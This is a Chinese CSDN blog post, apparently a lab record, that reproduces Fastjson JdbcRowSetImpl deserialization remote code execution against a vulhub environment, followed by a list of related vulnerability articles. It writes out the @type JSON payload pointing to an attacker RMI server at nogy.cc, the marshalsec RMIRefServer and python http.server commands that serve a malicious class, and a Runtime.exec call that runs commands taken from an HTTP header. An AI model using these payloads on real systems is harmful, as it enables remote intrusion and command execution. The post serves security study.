java 反显_java反序列化的恶意类回显实验

最新推荐文章于 2023-01-26 23:28:46 发布
最新推荐文章于 2023-01-26 23:28:46 发布
阅读量505 收藏
点赞数
文章标签: java 反显
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33102135/article/details/115075805
版权
本文档详述了一次使用Fastjson漏洞进行RMI(远程方法调用)攻击的实验过程。实验者通过搭建漏洞环境,利用marshalsec工具下载、编译并运行特定Java类,创建了一个RMI服务器。随后,构造了带有恶意payload的Java对象,通过设置`dataSourceName`为RMI地址来触发远程代码执行。攻击者可以将待执行命令藏于HTTP头中,以此达到远程控制目标系统的目地。
摘要由CSDN通过智能技术生成

//希望自己能持续的坚持学java

因为看书学java有点枯燥,虽然我没搞清楚状况,但是还是希望做个实验。以下是实验记录。

前提条件

准备一个 漏洞环境,比如vulhub里的fastjson

开始实验

vulhub 里的readme里的payload类似以下

{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://...",

"autoCommit":true

}

}

你需要做的是,

下载编译运行一个marshalsecgit clone .... && mvn clean package -DskipTests

下载编译准备好fnmds 大佬在博文中提到的写的这个类 wget ...DFS.java && javac -encoding UTF-8 DFS.java

玩!

你需要做的仅仅是一个web服务保证目标机器能访问到你的class文件

python -m http.server 80

这样你就有了一个类似 http://nogy.cc/DFS.class

然后根据这个地址启动一个rmi

java -cp marshalsec.jar marshalsec.jndi.RMIRefServer "http://nogy.cc/#DFS" 9999

这样你就得到了一个 rmi://nogy.cc:9999/DFS

所以选择了JdbcRowSetImpl + rmi 的你的payload就是

{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://nogy.cc:9999/DFS",

"autoCommit":true

}

}

? 你想执行的命令在header里,所以记得加上

Runtime.getRuntime().exec(r.getHeader("cmd")

20200710133853747885.png

那个吴小明
关注
C#笔记14 方法01
Tervor_HAN的博客
09-17 581
C#笔记14 方法01 ——本系列是基于人民邮电出版社《C#2008 C#图解教程》、清华大学出版社《C#入门经典(第五版)》两本书的自学C#笔记,如果您发现了本文的纰漏,还望不吝指正。 写在前边 在 C#笔记10 :基础 中,我们已经知道,方法是中重要的一个函数成员 除了中,方法也可以声明在结构体,接口中 *复习:方法是具有名称的可执行代码块,当方法被调用时,它执行自己所含的代码,然后返回到调用它的代码。有些方法返回一个值到它们被调用的位置。 1. 方法的结构 在的相关笔记中,我们已经知道了如何声
java反序列化RCE回显研究
java276582434的博客
05-25 2484
总结一下常见反序列化RCE回显几种方式如下: a).使用java.net.URLClassLoader,远程加载自定义(放在自己服务器上的jar包),可以自定义方法执行。 b).在自定义中,抛出异常,取得回显结果。 eg:Jboss报错返回命令执行结果。 利用defineClass加载byte[]返回Class对象,不用远程加载恶意。 直接利用RCE将执行的命令写入服务器文件...
Java反序列化6-Fastjson JdbcRowSetImpl 链及后续漏洞分析
weixin_43263451的博客
07-18 1514
上一节讲了TemplatesImpl链的利用方式,但是呢其局限性较大需要后端开启Feature.SupportNonPublicField且因为Feature.SupportNonPublicField是在fastjson1.2.22版本才引入所以只影响1.2.22-1.2.24版本fastjson这里的JdbcRowSetImpl链比TemplatesImpl链利用范围更大一点后面版本的fastjson漏洞都是在绕过黑名单,所以在本文中一次全部陈述总结前言.前言.前言。............
Fastjson 的 3 种漏洞利用链,一起来看看
Java技术栈,分享最主流的Java技术
11-05 1642
作者:4ra1n 来源:https://www.anquanke.com/post/id/248892 Fastjson已被大家分析过很多次,本文主要是对三种利用链做分析和对比 JdbcRowSetImpl String payload = "{\n" + " \"a\":{\n" + " \"@type\":\"java.lang.Class\",\n&quot
Fastjson反序列化漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3336
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列化的时候防止子中包含接口或抽象的时候,型丢失,这样我们在反序列化的时候就不需要再指定名。
FastJson反序列化漏洞(复现)
小赵同学的博客
07-29 3967
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险,并调用危险连接远程RMI主机,通过其中的恶意执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
Java反序列化回显解决方案.docx
12-19
Java反序列化回显解决方案 Java反序列化回显解决方案是指在Java中,使用反序列化来执行命令,导致RCE(Remote Code Execution)的解决方案。该解决方案主要涉及到Java反序列化机制和ClassLoader的使用。 首先,...
067-JAVA反序列化基于常见框架_中间件回显方案.pdf
09-20
1. 远程加载回显:攻击者构造恶意序列化数据,使得目标系统在反序列化过程中尝试从远程服务器加载或资源,从而实现命令执行或数据泄露。 2. 在目标网站写文件:通过反序列化漏洞,攻击者可能可以控制目标系统写入...
Java安全之反序列化回显与内存码,java程序设计项目化教程课后题答案
m0_63174420的博客
11-10 440
所以获取request的处理请求是 Connector—>AbstractProtocol$ConnectoinHandler—>global—>RequestInfo—>Request—>Response 而在Tomcat启动过程红会将Connector放入Service中。 而现在获取完成的流程是 StandardService—>Connector—>AbstractProtocol$ConnectoinHandler—>RequestGroupInf
JAVA详细思路|Java安全之FastJson JdbcRowSetImpl 链分析
m0_57227221的博客
05-17 1079
Java安全之FastJson JdbcRowSetImpl 链分析 0x00 前言 这一次我们来学习 JdbcRowSetImpl 利用链, JdbcRowSetImpl 的利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。 0x01 漏洞分析 利用限制 首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。 RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 LADP利用JDK版本≤
sun.jdbc.rowset的jar包
06-17
sun.jdbc.rowset的jar包,2000年的老包。不过有些老项目需要。 包括sun.jdbc.rowset.CachedRowSet
fastjson反序列化漏洞
scu_hacker博客
02-10 3362
目录 前言 一、漏洞原理 二、漏洞复现 2.1 fastjson<=1.2.24 2.2 1.2.24<=fastjson<=1.2.47 2.2.1在攻击机上编译 2.2.2 开启rmi和ldap服务 2.2.3 写入poc 参考资料 前言 fastjson是阿里开发的json解析库,可以将java对象解析为json,也可以将json反序列化java对象,主要用json.parse()方法进行反序列化。 一、漏洞原理 ...
vulhub复现之fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 2928
目录什么是json?fastjson有啥用?什么是fastjson?json语法规则为什么要引进AutoType?漏洞原理怎么确认存在漏洞的?漏洞复现反弹shell。
Fastjson1.2.47反序列化漏洞
weixin_51151498的博客
01-05 993
Fastjson1.2.47反序列化漏洞
Fastjson远程命令执行漏洞总结
qq_44796739的博客
07-29 1445
Fastjson远程命令执行漏洞总结
FastJson反序列化系列漏洞分析
守拙的博客
08-29 3151
fastsjon 1.2.24-1.2.68 多个版本反序列化漏洞的分析复现
Fastjson历史漏洞复现
懂进攻知防守
07-27 1434
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的,并调用该set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
Java安全-Java Vuls(Fastjson、Weblogic漏洞复现)
最新发布
2301_76220758的博客
01-26 201
Java安全-Java Vuls(Fastjson、Weblogic漏洞复现)
Java代码审计——Fastjson JdbcRowSetImpl调用链
王嘟嘟的博客
12-09 1229
0x00 前言 反序列化总纲 单独的把fastjson的调用链拎出来进行分析。 fastjson可参考:https://blog.csdn.net/qq_36869808/article/details/121697765?spm=1001.2014.3001.5501 0x01 JdbcRowSetImpl 这里要是需要使用JNDI就必须通过lookup方法,这个参考:待填坑。 首先来看fastjson payload,有两个参数:一个是dataSourceName,另外一个是autoCommit {"@
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值